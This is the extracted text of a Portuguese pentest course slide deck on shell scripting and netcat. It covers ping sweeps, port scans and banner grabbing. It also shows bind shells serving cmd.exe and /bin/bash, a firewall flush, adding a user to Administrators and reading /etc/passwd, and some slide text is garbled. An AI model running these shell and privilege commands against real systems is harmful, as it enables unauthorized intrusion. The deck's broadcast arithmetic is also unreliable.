Pentest com script shell Perl Cerutti IESGF 2014

Pentest com script shell & Perl Cerutti – IESGF - 2014

Ping broadcast • Veja a mascara da sura rede. • O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. • Por exemplo: – Meu IP na rede é 10. 1. 1. 30 – A mascara é 255. 192 – O end de broadcast será 10. 1. 1. 33

• root# ping 192. 168. 0. 255 • PING 192. 168. 0. 255 (192. 168. 0. 255): 56 data bytes • 64 bytes from 192. 168. 0. 150: icmp_seq=0 ttl=64 time=0. 063 ms • 64 bytes from 192. 168. 0. 165: icmp_seq=0 ttl=64 time=30. 095 ms • 64 bytes from 192. 168. 0. 150: icmp_seq=1 ttl=64 time=0. 117 ms • 64 bytes from 192. 168. 0. 165: icmp_seq=1 ttl=64 time=17. 263 ms

alternativa • Linux / UNIX one liner to ping all hosts on the LAN • Type the following command, enter: $ for ip in $(seq 1 254); do ping -c 1 192. 168. 1. $ip>/dev/null; [ $? -eq 0 ] && echo "192. 168. 1. $ip UP" || : ; done Output: • 192. 168. 1. 1 UP 192. 168. 1. 2 UP 192. 168. 1. 5 UP. . . 192. 168. 1. 254 UP

Netcat According to Sec. Tools. org , Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011

• http: //packetstormsecurity. org/files/downloa d/14051/nc 110. tgz • sudo apt-get install netcat-traditional

Desativar firewall Iptables -F

Chat interface

Hypervisors

Conectar porta • conectar porta alta qualquer, por exemplo porta. TCP 1234 • $ nc -l 1234 nc is now listening on port 1234 for a connection. On a second console (or a second • machine), connect to the machine and port being listened on: • • $ nc 127. 0. 0. 1 1234

chat

transferindo dados com Netcat • –vv (double v) for additional verbosity that will give you the number of • bytes transferred during a file transfer. The –w switch instructs Netcat to wait for a specific • number of seconds before timing out the connection. In our example, we specify 30 seconds

Transferencia no MAC-OSX • nc -v -w 30 -p 1234 –l > secret. txt • • Start by using nc to listen on a specific port, with output captured into a file: $ nc -l 1234 > filename. out Using a second machine, connect to the listening nc process, feeding it the file which is to be trans • ferred: • • • $ nc host. example. com 1234 < filename. in After the file has been transferred, the connection will close automatically.

banner grabbing with Netcat

Windows remote shell (and simple post-exploitation hi-jinks) • • Preparing the listener nc –Lp 31337 –vv –e cmd. exe Connecting to the target nc 192. 168. 0. 10 31337 – Dir c: / – Md /invasao – net localgroup Administrators bob

Linux shell • sudo nc –lp 31337 –e /bin/bash • Connecting to the target • As I have demonstrated in the previous exercise, you simply connect to the host (as shown • below) and the port that you want to connect to, and the listener will serve up the bash shell • for you as follows: • nc 192. 168. 0. 11 31337 • grep bob /etc/passwd

Abrindo paginas web no servidor • $ echo -n "GET / HTTP/1. 0rn" | nc host. example. com 80

Enviando email • $ nc localhost 25 << EOF • HELO host. example. com • MAIL FROM: <user@host. example. com> • RCPT TO: <user 2@host. example. com> • DATA • Body of email. • QUIT • EOF

Varredura de portas • $ nc -z host. example. com 20 -30 • Connection to host. example. com 22 port [tcp/ssh] succeeded! • Connection to host. example. com 25 port [tcp/smtp] succeeded! • The port range was specified to limit the search to ports 20 - 30.

which server software is running, and which versions. • o first make a connection, and then break the connection when the banner has been retrieved. • This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" • command to the server: • • $ echo "QUIT" | nc host. example. com 20 -30 SSH-1. 99 -Open. SSH_3. 6. 1 p 2 Protocol mismatch. 220 host. example. com IMS SMTP Receiver Version 0. 84 Ready

• • Open a TCP connection to port 42 of host. example. com using 10. 1. 2. 3 as the IP for the local end of the connection: • $ nc -s 10. 1. 2. 3 host. example. com 42 • Create and listen on a Unix Domain Socket: • • $ nc -l. U /var/tmp/dsocket Connect to port 42 of host. example. com via an HTTP proxy at 10. 2. 3. 4, port 8080. This example could also be used by ssh(1); see the Proxy. Command directive in ssh_config(5) for more information. $ nc -x 10. 2. 3. 4: 8080 -Xconnect host. example. com 42

Scanning a range of devices with a script • for i in {10. . 12}; do nc –vv –n –w 1 192. 168. 0. $i 21 -25 –z; done

Official sites • Unix Netcat Homepage: http: //nc 110. sourceforge. net/ • GNU Netcat Project: http: //netcat. sourceforge. net/ • Ncat – The Nmap Project: http: //www. nmap. org/ncat

Articles and tutorials • • • • Offensive Security explains how to create a persistent back door using Netcat and Metasploit's Meterpreter: http: //www. offensive-security. com/metasploit-unleashed/Persistent_ Netcat_Backdoor Crazy Netcat Relays for Fun and Profit: http: //pauldotcom. com/wiki/index. php/Episode 195#Tech_Segment: _Crazy. Ass_Netcat_Relays_for_Fun_and_Profit SANS Institute Netcat Pocket Cheatsheet: http: //www. sans. org/security-resources/sec 560/netcat_cheat_sheet_ v 1. pdf Some interesting use cases not covered in this book by Johannes Franken: http: //www. jfranken. de/homepages/johannes/vortraege/netcat. en. html A great reference for using Netcat for debugging SOAP and XML web services using Netcat: http: //parand. com/say/index. php/2005/03/11/simple-recipe-fordebuggingweb-services/

Twitter • • • Follow Thomas Wilhelm on Twitter: https: //twitter. com/#!/thomas_wilhelm Follow Brian Baskin on Twitter: https: //twitter. com/#!/bbaskin Follow Michael Scherer on Twitter: https: //twitter. com/#!/theprez 98 Follow Ed Skoudis on Twitter: https: //twitter. com/#!/edskoudis For more Open Source information, follow Packt at: http: //twitter. com/#!/packtopensource